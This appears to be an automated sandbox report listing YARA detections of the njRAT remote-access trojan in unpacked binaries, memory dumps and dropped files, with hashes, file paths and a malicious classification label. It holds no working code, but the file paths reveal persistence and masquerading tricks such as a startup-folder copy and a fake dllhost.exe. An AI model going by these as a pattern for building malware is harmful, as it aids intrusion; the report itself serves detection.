Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi

Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@33/24@4/4

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AB0A AdjustTokenPrivileges,	2_2_00E8AB0A
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AAD3 AdjustTokenPrivileges,	2_2_00E8AAD3
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AD86 AdjustTokenPrivileges,	16_2_0098AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AD4F AdjustTokenPrivileges,	16_2_0098AD4F
